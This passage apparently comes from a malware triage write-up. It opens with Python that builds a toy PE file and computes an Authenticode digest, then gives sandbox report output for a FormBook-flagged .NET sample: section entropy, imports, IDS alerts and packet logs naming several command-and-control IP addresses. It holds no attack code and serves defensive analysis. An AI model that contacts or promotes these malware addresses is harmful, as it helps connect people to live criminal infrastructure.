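    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, PE_OFF)
    # COFF header: i386, 1 section, 224-byte PE32 optional header, EXECUTABLE|32BIT
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x14C, 1, 0x67510DEE, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)          # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)        # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)  # Section / file alignment
    struct.pack_into("<I", opt, 56, 0x2000)          # SizeOfImage
    struct.pack_into("<I", opt, 60, SECTION_RAW)     # SizeOfHeaders
    struct.pack_into("<I", opt, 64, checksum)        # CheckSum (not covered by the digest)
    struct.pack_into("<I", opt, 92, 16)              # NumberOfRvaAndSizes
    if cert_blob:
        # Data directory 4 (Security) holds a file offset, not an RVA.
        struct.pack_into("<II", opt, 96 + 4 * 8, SECTION_RAW + SECTION_SIZE, len(cert_blob))
    sect = struct.pack("<8sIIIIIIHHI", b".text\0\0\0", SECTION_SIZE, 0x1000,
                       SECTION_SIZE, SECTION_RAW, 0, 0, 0, 0, 0x60000020)
    headers = bytes(dos) + coff + bytes(opt) + sect
    headers += b"\0" * (SECTION_RAW - len(headers))
    return headers + code.ljust(SECTION_SIZE, b"\0") + cert_blob


def authenticode_digest(pe, algo="sha256"):
    """Hash a PE in the order the Authenticode PE signature format prescribes."""
    h = hashlib.new(algo)
    pe_off = struct.unpack_from("<I", pe, 0x3C)[0]
    nsect = struct.unpack_from("<H", pe, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", pe, pe_off + 20)[0]
    opt = pe_off + 24
    checksum_off = opt + 64
    secdir_off = opt + 96 + 4 * 8
    cert_off, cert_len = struct.unpack_from("<II", pe, secdir_off)
    size_of_headers = struct.unpack_from("<I", pe, opt + 60)[0]
    # Headers, minus CheckSum and the Security directory entry
    h.update(pe[:checksum_off])
    h.update(pe[checksum_off + 4:secdir_off])
    h.update(pe[secdir_off + 8:size_of_headers])
    # Section raw data, ordered by file offset
    sections = []
    for i in range(nsect):
        raw_size, raw_ptr = struct.unpack_from("<II", pe, opt + opt_size + i * 40 + 16)
        sections.append((raw_ptr, raw_size))
    hashed = size_of_headers
    for raw_ptr, raw_size in sorted(sections):
        h.update(pe[raw_ptr:raw_ptr + raw_size])
        hashed += raw_size
    # Any trailing data, except the certificate table itself
    if len(pe) > hashed:
        tail = pe[hashed:]
        if cert_len:
            rel = cert_off - hashed
            tail = tail[:rel] + tail[rel + cert_len:]
        h.update(tail)
    return h.hexdigest()


def demo():
    """Show which fields the digest ignores and which changes it catches."""
    code = b"\xff\x25\x00\x20\x40\x00"          # jmp dword ptr [0x402000], the thunk at the entrypoint
    cert = b"WIN_CERTIFICATE-placeholder-" * 2  # stands in for the PKCS#7 blob (assumed content)
    plain = authenticode_digest(build_pe(code))
    return {
        "cert_table_ignored": authenticode_digest(build_pe(code, cert)) == plain,
        "checksum_ignored": authenticode_digest(build_pe(code, cert, 0xDEADBEEF)) == plain,
        "code_change_caught": authenticode_digest(build_pe(b"\x90" + code, cert)) != plain,
        "differs_from_file_sha256": hashlib.sha256(build_pe(code, cert)).hexdigest() != plain,
    }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

The last check is the one that matters for triage: the SHA-256 the report lists for the file covers the appended certificate table, so it changes whenever an attacker re-signs or re-pads the binary, while the Authenticode digest is the value the signature actually commits to. On a real sample the same function, applied to the file on disk, gives the hash to compare against the messageDigest inside the SpcIndirectDataContent of the PKCS#7 blob.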
                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                 add byte ptr [eax], al   (repeated for the remaining 97 instruction lines: after the six-byte jmp thunk the disassembler reads zero padding, and the byte pair 00 00 decodes to this instruction)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xca4e4 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcc000 | 0x1bf0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xca600 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xce000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc8544 | 0xc8600 | 66a80c0ba66fecae7bc5c9c26a04f407 | False | 0.8885500331409857 | data | 7.73824516544036 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xcc000 | 0x1bf0 | 0x1c00 | b85bb2436777e9f494e6549eb35c1cbd | False | 0.8729073660714286 | data | 7.401746350570453 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xce000 | 0xc | 0x200 | 3c0a0ef4f823c0ebccbdff10fb5fdc3f | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xcc0e8 | 0x174e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9639624539054643
RT_GROUP_ICON | 0xcd838 | 0x14 | data | | | 1.05
RT_VERSION | 0xcd84c | 0x3a0 | data | | | 0.41594827586206895
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-09T08:43:36.387491+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49729 | 162.0.215.33 | 80 | TCP
2024-12-09T08:43:39.011783+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49730 | 162.0.215.33 | 80 | TCP
2024-12-09T08:43:41.623741+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49731 | 162.0.215.33 | 80 | TCP
2024-12-09T08:43:51.260792+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49733 | 104.18.73.116 | 80 | TCP
2024-12-09T08:43:53.845627+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49734 | 104.18.73.116 | 80 | TCP
2024-12-09T08:43:56.559978+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49735 | 104.18.73.116 | 80 | TCP
2024-12-09T08:44:06.861014+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49738 | 192.185.147.100 | 80 | TCP
2024-12-09T08:44:09.488062+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49739 | 192.185.147.100 | 80 | TCP
2024-12-09T08:44:12.232412+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49740 | 192.185.147.100 | 80 | TCP
2024-12-09T08:44:21.321792+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49742 | 13.248.169.48 | 80 | TCP
2024-12-09T08:44:23.989425+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49743 | 13.248.169.48 | 80 | TCP
2024-12-09T08:44:26.663334+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49744 | 13.248.169.48 | 80 | TCP
2024-12-09T08:44:37.080387+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49747 | 3.33.130.190 | 80 | TCP
2024-12-09T08:44:39.683703+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49748 | 3.33.130.190 | 80 | TCP
2024-12-09T08:44:42.368068+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49749 | 3.33.130.190 | 80 | TCP
2024-12-09T08:44:52.069945+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49751 | 104.21.38.113 | 80 | TCP
2024-12-09T08:44:54.742227+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49752 | 104.21.38.113 | 80 | TCP
2024-12-09T08:44:57.415681+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49753 | 104.21.38.113 | 80 | TCP
2024-12-09T08:45:45.976450+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49755 | 103.249.106.91 | 80 | TCP
2024-12-09T08:45:48.712723+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49756 | 103.249.106.91 | 80 | TCP
2024-12-09T08:45:51.466321+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49757 | 103.249.106.91 | 80 | TCP
2024-12-09T08:46:01.778823+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49760 | 121.43.155.35 | 80 | TCP
2024-12-09T08:46:04.485609+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49761 | 121.43.155.35 | 80 | TCP
2024-12-09T08:46:07.139061+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49762 | 121.43.155.35 | 80 | TCP
2024-12-09T08:46:26.853604+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49764 | 199.192.23.123 | 80 | TCP
2024-12-09T08:46:29.526825+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49765 | 199.192.23.123 | 80 | TCP
2024-12-09T08:46:32.175938+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49766 | 199.192.23.123 | 80 | TCP
2024-12-09T08:46:42.249558+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49768 | 52.60.87.163 | 80 | TCP
                                                                Dec 9, 2024 08:44:10.723858118 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:10.723947048 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:10.745417118 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:10.864726067 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:10.864742041 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.232300043 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.232319117 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.232331038 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.232412100 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:12.232769966 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.232810974 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:12.232968092 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.232979059 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.233015060 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:12.233108044 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.233119965 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.233151913 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:12.233891010 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.233906031 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.233979940 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:12.257260084 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:12.353029013 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.353099108 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:12.353168011 CET8049740192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:12.353250980 CET4974080192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:13.282598972 CET4974180192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:13.401947975 CET8049741192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:13.402151108 CET4974180192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:13.414529085 CET4974180192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:13.534060001 CET8049741192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:14.603224993 CET8049741192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:14.603244066 CET8049741192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:14.603424072 CET4974180192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:14.606357098 CET4974180192.168.2.12192.185.147.100
                                                                Dec 9, 2024 08:44:14.725577116 CET8049741192.185.147.100192.168.2.12
                                                                Dec 9, 2024 08:44:20.100122929 CET4974280192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:20.219598055 CET804974213.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:20.219733000 CET4974280192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:20.233211040 CET4974280192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:20.352673054 CET804974213.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:21.320544004 CET804974213.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:21.321290970 CET804974213.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:21.321791887 CET4974280192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:21.741673946 CET4974280192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:22.760935068 CET4974380192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:22.880390882 CET804974313.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:22.882544994 CET4974380192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:22.897825003 CET4974380192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:23.019695044 CET804974313.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:23.989308119 CET804974313.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:23.989384890 CET804974313.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:23.989424944 CET4974380192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:24.414376974 CET4974380192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:25.433732986 CET4974480192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:25.554250002 CET804974413.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:25.554339886 CET4974480192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:25.575764894 CET4974480192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:25.695278883 CET804974413.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:25.695319891 CET804974413.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:26.663047075 CET804974413.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:26.663130999 CET804974413.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:26.663333893 CET4974480192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:27.086324930 CET4974480192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:28.105864048 CET4974580192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:28.225773096 CET804974513.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:28.225858927 CET4974580192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:28.234287024 CET4974580192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:28.353705883 CET804974513.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:30.346880913 CET804974513.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:30.346901894 CET804974513.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:30.347029924 CET4974580192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:30.349854946 CET4974580192.168.2.1213.248.169.48
                                                                Dec 9, 2024 08:44:30.470009089 CET804974513.248.169.48192.168.2.12
                                                                Dec 9, 2024 08:44:35.796797991 CET4974780192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:35.916238070 CET80497473.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:35.916332006 CET4974780192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:35.938441992 CET4974780192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:36.057986021 CET80497473.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:37.076947927 CET80497473.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:37.076975107 CET80497473.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:37.080387115 CET4974780192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:37.445776939 CET4974780192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:38.464165926 CET4974880192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:38.583693981 CET80497483.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:38.584171057 CET4974880192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:38.600310087 CET4974880192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:38.719800949 CET80497483.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:39.683572054 CET80497483.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:39.683640003 CET80497483.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:39.683702946 CET4974880192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:40.101423979 CET4974880192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:41.144166946 CET4974980192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:41.264854908 CET80497493.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:41.266144991 CET4974980192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:41.295137882 CET4974980192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:41.414568901 CET80497493.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:41.414635897 CET80497493.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:42.360424995 CET80497493.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:42.367988110 CET80497493.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:42.368067980 CET4974980192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:42.804390907 CET4974980192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:43.822851896 CET4975080192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:43.942318916 CET80497503.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:43.942406893 CET4975080192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:43.956914902 CET4975080192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:44.076332092 CET80497503.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:45.074815035 CET80497503.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:45.074841022 CET80497503.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:45.075263977 CET4975080192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:45.077831984 CET4975080192.168.2.123.33.130.190
                                                                Dec 9, 2024 08:44:45.198231936 CET80497503.33.130.190192.168.2.12
                                                                Dec 9, 2024 08:44:50.431523085 CET4975180192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:50.550920963 CET8049751104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:50.551630020 CET4975180192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:50.570185900 CET4975180192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:50.689513922 CET8049751104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:52.069945097 CET4975180192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:52.190831900 CET8049751104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:52.190886021 CET4975180192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:53.092395067 CET4975280192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:53.211745024 CET8049752104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:53.211889982 CET4975280192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:53.228396893 CET4975280192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:53.347676039 CET8049752104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:54.742227077 CET4975280192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:54.861957073 CET8049752104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:54.862241983 CET4975280192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:55.761655092 CET4975380192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:55.880873919 CET8049753104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:55.880965948 CET4975380192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:55.898485899 CET4975380192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:56.017692089 CET8049753104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:56.017848015 CET8049753104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:57.415680885 CET4975380192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:57.536431074 CET8049753104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:57.536482096 CET4975380192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:58.420459032 CET4975480192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:58.540945053 CET8049754104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:44:58.544626951 CET4975480192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:58.556433916 CET4975480192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:44:58.676484108 CET8049754104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:45:38.570445061 CET8049754104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:45:38.573884964 CET8049754104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:45:38.576564074 CET4975480192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:45:38.576564074 CET4975480192.168.2.12104.21.38.113
                                                                Dec 9, 2024 08:45:38.695868015 CET8049754104.21.38.113192.168.2.12
                                                                Dec 9, 2024 08:45:44.335011005 CET4975580192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:44.455141068 CET8049755103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:44.455231905 CET4975580192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:44.474548101 CET4975580192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:44.593825102 CET8049755103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:45.976449966 CET4975580192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:45.994277954 CET8049755103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:45.994326115 CET8049755103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:45.994338036 CET4975580192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:45.994379997 CET4975580192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:46.095733881 CET8049755103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:46.095783949 CET4975580192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:47.040719032 CET4975680192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:47.160209894 CET8049756103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:47.164731979 CET4975680192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:47.198342085 CET4975680192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:47.317675114 CET8049756103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:48.709275007 CET8049756103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:48.709379911 CET8049756103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:48.712723017 CET4975680192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:48.712778091 CET4975680192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:48.712778091 CET4975680192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:48.832829952 CET8049756103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:48.836823940 CET4975680192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:49.814985037 CET4975780192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:49.934232950 CET8049757103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:49.934320927 CET4975780192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:49.985852003 CET4975780192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:50.105201006 CET8049757103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:50.105237961 CET8049757103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:51.466078997 CET8049757103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:51.466212988 CET8049757103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:51.466320992 CET4975780192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:51.492249966 CET4975780192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:52.548738956 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:52.668715954 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:52.674760103 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:52.758831978 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:52.878195047 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299120903 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299150944 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299164057 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299290895 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.299482107 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299524069 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.299664974 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299675941 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299686909 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.299715996 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.300338984 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.300350904 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.300363064 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.300379992 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.300400019 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.418662071 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.418726921 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.418857098 CET4975880192.168.2.12103.249.106.91
                                                                Dec 9, 2024 08:45:54.422980070 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.514481068 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.514619112 CET8049758103.249.106.91192.168.2.12
                                                                Dec 9, 2024 08:45:54.514699936 CET4975880192.168.2.12103.249.106.91
